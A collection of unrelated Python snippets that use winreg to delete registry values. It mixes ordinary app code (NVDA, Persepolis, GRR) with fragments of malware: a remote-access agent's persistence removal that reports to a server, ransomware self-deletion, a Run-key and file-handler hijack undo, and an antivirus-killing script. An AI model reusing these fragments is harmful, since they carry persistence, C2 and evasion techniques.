def delReg(self, name, REG_PATH=r'SOFTWARE\ResIPy'): """Deletes registry value in a key - not the key Parameters ---------- name : str registry key name value : str registry key value REG_PATH : str, optional registry key path in Windows registry """ try: registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_WRITE) winreg.DeleteValue(registry_key, name) winreg.CloseKey(registry_key) except WindowsError: return None
def setKey(key_dict, bits=64): """Set key name and value.""" if bits == 32: key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\WOW6432Node\GNU\Emacs", 0, winreg.KEY_WRITE) else: key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\GNU\Emacs", 0, winreg.KEY_WRITE) for name, value in key_dict.items(): if name[0] != '_': winreg.SetValueEx(key, name, 0, winreg.REG_SZ, value) else: try: winreg.DeleteValue(key, name[1:]) except Exception: continue winreg.CloseKey(key)
def appendValue(self, val): name, vala = self.getAllNameValue() if len(vala) > 0 and val == vala[0]: return False # for n1 in name: winreg.DeleteValue(self.reg_key, n1) # r1 = [val] for ri in vala: if len(r1) >= self.nmax: break if ri != val: r1.append(ri) # for i in range(len(r1)): winreg.SetValueEx(self.reg_key, "File" + str(i + 1), 0, winreg.REG_SZ, r1[i]) # return True
def setStartAfterLogon(enable): if getStartAfterLogon() == enable: return if easeOfAccess.isSupported and easeOfAccess.canConfigTerminateOnDesktopSwitch: easeOfAccess.setAutoStart(winreg.HKEY_CURRENT_USER, enable) if enable: return # We're disabling, so ensure the run key is cleared, # as it might have been set by an old version. run = False else: run = enable k = winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_REGKEY, 0, winreg.KEY_WRITE) if run: winreg.SetValueEx(k, u"nvda", None, winreg.REG_SZ, sys.argv[0]) else: try: winreg.DeleteValue(k, u"nvda") except WindowsError: pass
def setStartAfterLogon(enable: bool) -> None: """Not to be confused with setStartOnLogonScreen. Toggle if NVDA automatically starts after a logon. Sets easeOfAccess related registry keys on Windows 8 or newer. On Windows 7 this sets the registry run key. When toggling off, always delete the registry run key in case it was set by an earlier version of NVDA or on Windows 7 or earlier. """ if getStartAfterLogon() == enable: return if easeOfAccess.canConfigTerminateOnDesktopSwitch: easeOfAccess.setAutoStart(easeOfAccess.AutoStartContext.AFTER_LOGON, enable) if enable: return # We're disabling, so ensure the run key is cleared, # as it might have been set by an old version. run = False else: run = enable k = winreg.OpenKey(winreg.HKEY_CURRENT_USER, RegistryKey.RUN.value, 0, winreg.KEY_WRITE) if run: winreg.SetValueEx(k, "nvda", None, winreg.REG_SZ, sys.argv[0]) else: try: winreg.QueryValue(k, "nvda") except FileNotFoundError: log.debug( "The run registry key is not set for setStartAfterLogon." "This is expected for Windows 8+ which uses ease of access" ) return try: winreg.DeleteValue(k, "nvda") except WindowsError: log.error( "Couldn't unset registry key for nvda to start after logon.", exc_info=True )
def remove_startup(self): import platform if platform.system() == 'Windows': import winreg as reg registry = reg.OpenKey(reg.HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Run', 0, reg.KEY_WRITE) reg.DeleteValue(registry, 'Automagica') reg.CloseKey(registry) if platform.system() == 'Linux': path = os.path.join(os.path.expanduser( '~'), '.config/autostart/Automagica.desktop') os.remove(path) if platform.system() == 'Darwin': path = os.path.join(os.path.expanduser( '~'), '/Library/LaunchAgents/com.automagica.robot.plist') os.remove(path)
def write_section(opts, data): """ Writes the data for a credentials section. Args: opts (Namespace): Options passed to the utility. data (dict): Contains the data to be written, indexed by CredentialValue. """ with open_base_key(opts) as base_key: with open_section_key(opts, base_key) as section_key: for k in list(CredentialValue): if k in data: if k.requires_boolean_value(): winreg.SetValueEx(section_key, k.name.lower(), 0, winreg.REG_DWORD, 1 if data[k] else 0) elif data[k]: winreg.SetValueEx(section_key, k.name.lower(), 0, winreg.REG_SZ, data[k]) else: winreg.DeleteValue(section_key, k.name.lower())
def save(self): if self._changed: try: rootkey = winreg.OpenKey(self._keytype, self._keypath, 0, winreg.KEY_WRITE) except FileNotFoundError: rootkey = winreg.CreateKey(self._keytype, self._keypath) for keyword in self._keywords: attr = getattr(self, keyword) if callable(attr): val = repr(attr()) else: val = repr(attr) winreg.SetValueEx(rootkey, keyword, 0, winreg.REG_SZ, val) for keyword in self._deletedkeywords: try: winreg.DeleteValue(rootkey, keyword) except FileNotFoundError: pass self._changed = False SettingsBase.save(self)
def path_cleanup(): ''' Removes SIMNIBS from PATH ''' if sys.platform in ['linux', 'darwin']: bashrc, backup_file = _get_bashrc() if not os.path.isfile(bashrc): print('Could not find bashrc file') return print('Removing SimNIBS install from PATH') print(f'Backing up the bashrc file at {backup_file}') _copy_and_log(bashrc, backup_file) with open(backup_file, 'r') as fin: with open(bashrc, 'w') as fout: for line in fin: if not re.search('simnibs', line, re.IGNORECASE): fout.write(line) else: simnibs_env_vars = _get_win_simnibs_env_vars() path = _get_win_path() path = path.split(';') path = [p for p in path if len(p) > 0] for key, value in simnibs_env_vars.items(): # If the directory is in the PATH variable, remove it path = [ os.path.normpath(p) for p in path if not (os.path.normpath(value) in os.path.normpath(p)) ] # Remove environment variable with winreg.OpenKey(winreg.HKEY_CURRENT_USER, 'Environment', access=winreg.KEY_WRITE) as reg: winreg.DeleteValue(reg, key) # write out the PATH with SimNIBS removed with winreg.OpenKey(winreg.HKEY_CURRENT_USER, 'Environment', access=winreg.KEY_WRITE) as reg: path = ';'.join(path) + ';' winreg.SetValueEx(reg, 'Path', 0, winreg.REG_EXPAND_SZ, path)
def UnsetPyKeyVal(key_name, value_name, delete_key=False): root_hkey = get_root_hkey() root_key = winreg.OpenKey(root_hkey, root_key_name) try: my_key = winreg.OpenKey(root_key, key_name, 0, winreg.KEY_SET_VALUE) try: winreg.DeleteValue(my_key, value_name) if verbose: print("-> DELETE %s\\%s[%s]" % (root_key_name, key_name, value_name)) finally: my_key.Close() if delete_key: winreg.DeleteKey(root_key, key_name) if verbose: print("-> DELETE %s\\%s" % (root_key_name, key_name)) except OSError as why: winerror = getattr(why, "winerror", why.errno) if winerror != 2: # file not found raise finally: root_key.Close()
def rmRulesByDir(folder): key = winreg.OpenKeyEx(winreg.HKEY_LOCAL_MACHINE,baseRegPath,access=winreg.KEY_ALL_ACCESS ) i = 0 subDels = [] while True: try: name, value, regType = winreg.EnumValue(key, i) rules = value.split('|') rulesDict = {} for rule in rules: rulesDict.update(urllib.parse.parse_qsl(rule,keep_blank_values=True)) if 'App' in rulesDict: print(rulesDict['App'],f'{folder}') pos = rulesDict['App'].find(f'{folder}') if pos == 0: subDels.append(name) except Exception as e: break finally: i += 1 for subkey in subDels: winreg.DeleteValue(key,subkey)
def set_run_key(self, key, value): """ Set/Remove Run Key in windows registry. :param key: Run Key Name :param value: Program to Run :return: None """ # This is for the system run variable reg_key = winreg.OpenKey( winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows", 0, winreg. KEY_SET_VALUE) #r'Software\Microsoft\Windows\CurrentVersion\Run', with reg_key: if value is None: winreg.DeleteValue(reg_key, key) else: if '%' in value: var_type = winreg.REG_EXPAND_SZ else: var_type = winreg.REG_SZ winreg.SetValueEx(reg_key, key, 0, var_type, value)
def delete_value(key_hive, key_path, value_name, access_type=Wow64RegistryEntry.KEY_WOW64): """ Delete registry value :param key_hive: Windows registry hive to edit, e.g. HKEY_CURRENT_USER :param key_path: Path Windows registry key inside the hive, for example "SOFTWARE\Microsoft\Windows" :param access_type: Access type for 32/64 bit registry sub-entries in HKLM/SOFTWARE key :param value_name: Value name to delete :return: True if success, False otherwise """ if access_type == Wow64RegistryEntry.KEY_WOW32_64: raise RuntimeError("Use either KEY_WOW64 or KEY_WOW32 with delete_value()") try: key_hive_value = HIVES_MAP[key_hive] wow64_flags = WOW64_MAP[access_type] registry_key = winreg.OpenKey(key_hive_value, key_path, 0, (wow64_flags | winreg.KEY_WRITE)) winreg.DeleteValue(registry_key, value_name) return True except WindowsError as e: logger.error("Unable to delete registry value %s\\%s with LastError=%d [%s]", key_hive, key_path, e.winerror, e.strerror) return None
def MSWSetEmulationLevel(level: int = wxWEBVIEWIE_EMU_DEFAULT, program_name: PathLike = None) -> bool: """ Sets the emulation level for wxWidgets WebView. :param level: The emulation level to use. :param program_name: The name of the program to set the emulation level for. Defaults to the Python executable. :no-default program_name: :return: Whether the operation completed successfully. """ if not program_name: program_name = sys.executable if not isinstance(program_name, pathlib.Path): program_name = pathlib.Path(program_name) # Registry key where emulation level for programs are set IE_EMULATION_KEY = "SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_BROWSER_EMULATION" try: key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, IE_EMULATION_KEY, access=winreg.KEY_ALL_ACCESS) except OSError: warnings.warn("Failed to find web view emulation level in the registry") return False if level != wxWEBVIEWIE_EMU_DEFAULT: for name in (program_name, program_name.name): winreg.SetValueEx(key, str(name), 0, 4, level) # type: ignore else: for name in (program_name, program_name.name): try: winreg.DeleteValue(key, str(name)) except OSError: pass return True
def reg_check(self, policy, val): try: item = policy["key_item"] path = policy["value_data"].replace("HKLM\\", "") hKey = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path, 0, winreg.KEY_ALL_ACCESS) if item: result = winreg.QueryValueEx(hKey, item) if val == "MUST_NOT_EXIST": winreg.DeleteValue(hKey, item) return {"status": 0, "msg": "Success"} return {"status": -1, "msg": "Couldn't rollback"} except Exception as e: if val == "MUST_EXIST": winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE, path) key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path, 0, winreg.KEY_ALL_ACCESS) item = policy["key_item"] if item: winreg.SetValueEx(key, item, 0, winreg.REG_DWORD, 0) return {"status": 0, "msg": "Success"} return {"status": -1, "msg": "Couldn't rollback"}
def persistence_remove(command, session, base_url): source, file_name, user_profile, destination = system_recon() if os.path.exists(destination): output_server = '' os.remove(destination) output_server += f'\t[X] File "{file_name}" deleted...\n' with winreg.OpenKey( winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_ALL_ACCESS ) as key: winreg.DeleteValue( key, 'Windows-Update-Manager' ) output_server += f'\t[X] Register cleaned...\n' session.post(url=base_url, data=output_server) else: session.post(url=base_url, data='\t[X] System not persisted...\n')
def set_run_key(key, value): """ Set/Remove Run Key in windows registry. :param key: Run Key Name :param value: Program to Run :return: None """ # This is for the system run variable reg_key = winreg.OpenKey( winreg.HKEY_CURRENT_USER, REGISTRY_KEY, 0, winreg.KEY_SET_VALUE) with reg_key: if value is None: winreg.DeleteValue(reg_key, key) else: if '%' in value: var_type = winreg.REG_EXPAND_SZ else: var_type = winreg.REG_SZ winreg.SetValueEx(reg_key, key, 0, var_type, value)
def _DeleteLegacyConfigOptions(registry_key_uri): """Deletes config values in the registry for legacy GRR installations.""" key_spec = regconfig.ParseRegistryURI(registry_key_uri) try: regkey = winreg.OpenKeyEx(key_spec.winreg_hive, key_spec.path, 0, winreg.KEY_ALL_ACCESS) except OSError as e: if e.errno == errno.ENOENT: logging.info("Skipping legacy config purge for non-existent key: %s.", registry_key_uri) return else: raise for option in _LEGACY_OPTIONS: try: winreg.DeleteValue(regkey, option) logging.info("Deleted value '%s' of key %s.", option, key_spec) except OSError as e: # Windows will raise a no-such-file-or-directory error if the config # option does not exist in the registry. This is expected when upgrading # to a newer Fleetspeak-enabled version. if e.errno != errno.ENOENT: raise
def recoverReg(): run = r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run' # local machine txt = r'txtfile\shell\open\command' recoverTxt = r'%SystemRoot%\system32\NOTEPAD.EXE %1' key = winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, txt, access=winreg.KEY_ALL_ACCESS) try: # print(winreg.QueryValueEx(key, "")) winreg.SetValueEx(key, "", 0, winreg.REG_EXPAND_SZ, recoverTxt) # print("txt open changed\n") except WindowsError: # print(WindowsError) pass key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, run, access=winreg.KEY_ALL_ACCESS) try: # winreg.SetValueEx(key, "maliciousCode", 0, winreg.REG_SZ, self.scriptPath) # add this script to Run key winreg.DeleteValue(key, "maliciousCode") # print("auto run\n") except WindowsError: # print(WindowsError) pass
def _remove_files(self, to_delete): for reference in to_delete: file = reference["File"] for match in re.findall(r'(\[\{(\w+)\}\])', file): folder_id = get_knownfolderid(match[1]) if folder_id: file = file.replace(match[0], ) if os.path.isfile(file): os.remove(file) if "Registry" in reference: for registry in reference["Registry"]: if len(reference["Registry"][registry]) == 0: try: registry_key = winreg.OpenKey(get_registry_root(registry), get_registry_key(registry), 0, winreg.KEY_ALL_ACCESS) winreg.DeleteKey(registry_key) except WindowsError as e: print(e) else: for value in reference["Registry"][registry]: try: registry_key = winreg.OpenKey(get_registry_root(registry), get_registry_key(registry), 0, winreg.KEY_ALL_ACCESS) winreg.DeleteValue(registry_key, value) except WindowsError as e: print(e)
def removestartup(): # check if it is linux if os_type == 'Linux' or os_type == 'FreeBSD': # remove it os.remove(home_address + "/.config/autostart/persepolis.desktop") #TODO #adding remove startup command for mac OSX : # check if it is mac OS #elif platform == "darwin": # OS X # check if it is Windows elif os_type == 'Windows': if checkstartup() : # Connect to the startup path in Registry key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,winreg.KEY_ALL_ACCESS) # remove persepolis from startup winreg.DeleteValue(key, 'persepolis') # Close connection winreg.CloseKey(key)
def run_on_schedule_and_startup(self, enable=True, path=Path(__file__)): startup_key = r'Software\Microsoft\Windows\CurrentVersion\Run' winreg.CreateKeyEx(winreg.HKEY_CURRENT_USER, startup_key) key = winreg.OpenKeyEx(winreg.HKEY_CURRENT_USER, startup_key, access=winreg.KEY_WRITE) if enable: winreg.SetValueEx( key, 'Ungoogled Chromium Updater', 0, winreg.REG_SZ, f'"{sys.executable.replace("python.exe","pythonw.exe")}" "{path}"' ) else: try: winreg.DeleteValue(key, 'Ungoogled Chromium Updater') except FileNotFoundError: pass winreg.CloseKey(key) if enable: os.system( fr'''SchTasks /Create /SC DAILY /TN "Ungoogled Chromium Updater" /TR "'{sys.executable.replace('python.exe','pythonw.exe')}' '{path.absolute()}'" /ST 00:00 /F''' ) else: os.system( fr'''SchTasks /Delete /TN "Ungoogled Chromium Updater" /F''')
def self_destroy(exitafter=False): from crawler import exe_self try: key = winreg.CreateKey( winreg.HKEY_CURRENT_USER, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run") winreg.DeleteValue(key, config['core'].get('exename', exe_self)) winreg.CloseKey(key) except Exception as e: deb(f'remove from reg: {e}') try: with open("autodel.cmd", "wt", encoding='utf-8') as autodel_cmd: try: exe_name = config['core'].get('exe', fallback=exe_self) desktop_file = os.path.join(os.environ['USERPROFILE'], 'Desktop', 'YOUR_ENCRYPTED_FILES_DATA.txt') ini_file = os.path.join(os.environ['USERPROFILE'], Config.INI) autodel_cmd.write(f"timeout /t 5\r\n") encryption_dir = config['core'].get('encryption_dir', fallback=r'c:\temp\edata') deb(f'self_destroy()->enc dir: {encryption_dir} desktop_file: {desktop_file} exe_name: {exe_name} ini_file: {ini_file}' ) autodel_cmd.write(f'takeown /f decryptall.exe\r\n') autodel_cmd.write(f'takeown /f crawler.exe\r\n') autodel_cmd.write(f'takeown /f autodel.cmd\r\n') autodel_cmd.write(f'takeown /f {encryption_dir}\r\n') autodel_cmd.write( f'takeown /f YOUR_ENCRYPTED_FILES_DATA.txt\r\n') autodel_cmd.write(f"erase /f /s /q decryptall.exe\r\n") autodel_cmd.write( f"erase /f /s /q YOUR_ENCRYPTED_FILES_DATA.txt\r\n") autodel_cmd.write(f"erase /f /s /q crawler.exe\r\n") autodel_cmd.write(f"erase /f /s /q autodel.cmd\r\n") autodel_cmd.write(f'erase /f /s /q "{encryption_dir}"\r\n') autodel_cmd.write(f'rmdir /s /q "{encryption_dir}"\r\n') except Exception as e: exception(e, marker='self_destroy') try: if os.path.isfile(ini_file): os.unlink(ini_file) if os.path.isfile(desktop_file): os.unlink(desktop_file) if os.path.isfile(exe_name): os.unlink(exe_name) except Exception as e: deb(f'unlink: {e}') except Exception as e: exception(e, marker='open') try: os.startfile("autodel.cmd") except Exception as e: deb(f'startfile call: {e}') if exitafter: sys.exit()
def remove(name): """delete an autostart entry""" key = get_runonce() winreg.DeleteValue(key, name) winreg.CloseKey(key)
subprocess.Popen( r'%windir%\system32\rundll32.exe powrprof.dll,SetSuspendState Hibernate', shell=True) def Shuts_(self): subprocess.Popen("shutdown -s -t 0 -f", shell=True) if __name__ == "__main__": import sys try: regs = winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER) mykeys = winreg.OpenKey( regs, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_ALL_ACCESS) winreg.DeleteValue(mykeys, 'ShutdownPC') winreg.CloseKey(self.mykeys) except: pass regs = winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER) mykeys = winreg.OpenKey(regs, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_ALL_ACCESS) winreg.SetValueEx(mykeys, 'ShutdownPC', 0, winreg.REG_SZ, '"' + sys.argv[0] + '"' + " Minimum") winreg.CloseKey(mykeys) app = QtWidgets.QApplication(sys.argv) Form = QtWidgets.QWidget() ui = Ui_Form() ui.setupUi(Form) Form.show()
def registry_remove(registry_key_loc, G14dir): G14dir = str(G14dir) G14Key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, registry_key_loc, 0, winreg.KEY_ALL_ACCESS) winreg.DeleteValue(G14Key, "G14Control")
def unSetOnBoot(self): """Remove autorun entry from windows registry.""" if self.exists(): with self.autorunReg() as key: winreg.DeleteValue(key, r'McTidy')
def reg_del_value(key, path=SETTINGS): try: winreg.DeleteValue(path, key) except: pass
import winreg,wmi,os,signal av_list = ["notepad++"] # Remove Registry Keys reghives = [winreg.HKEY_LOCAL_MACHINE, winreg.HKEY_CURRENT_USER] regpaths = ["SOFTWARE\Microsoft\Windows\CurrentVersion\Run","SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"] for reghive in reghives: for regpath in regpaths: reg = winreg.ConnectRegistry(None,reghive) key = winreg.OpenKey(reg,regpath,0,access=winreg.KEY_READ) try: index = 0 while True: val = winreg.EnumValue(key,index) for name in av_list: if name in val[1]: print("Deleting %s Autorun Key" % val[0]) key2 = winreg.OpenKey(reg,regpath,0,access=winreg.KEY_SET_VALUE) winreg.DeleteValue(key2,val[0]) index += 1 except OSError: {} # Find and Kill Processes f = wmi.WMI() for process in f.Win32_Process(): for name in av_list: if name in process.Name: os.kill(int(process.processId),signal.SIGTERM)
#创建键 """ subDir = r"Software\Microsoft\Windows\CurrentVersion\Explorer" key_test = wg.OpenKey(wg.HKEY_CURRENT_USER, subDir) wg.CreateKey(key_test, 'Eastmount') wg.CloseKey(key_test) """ """ #获取键值数据项值 subDir = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Eastmount" key_test = wg.OpenKey(wg.HKEY_CURRENT_USER, subDir) value,type_ = wg.QueryValueEx(key_test,'yxz') print(value) print(type_) """ """ #创建键值数据项 subDir = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Eastmount" key_test = wg.OpenKey(wg.HKEY_CURRENT_USER, subDir) print(key_test) #PermissionError: [WinError 5] 拒绝访问 wg.SetValueEx(key_test,'data','',wg.REG_SZ,'0') wg.CloseKey(key_test) """ #删除键值数据项 subDir = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Eastmount" key_test = wg.OpenKey(wg.HKEY_CURRENT_USER, subDir, 0, wg.KEY_WRITE) wg.DeleteValue(key_test, 'yxz') wg.CloseKey(key_test)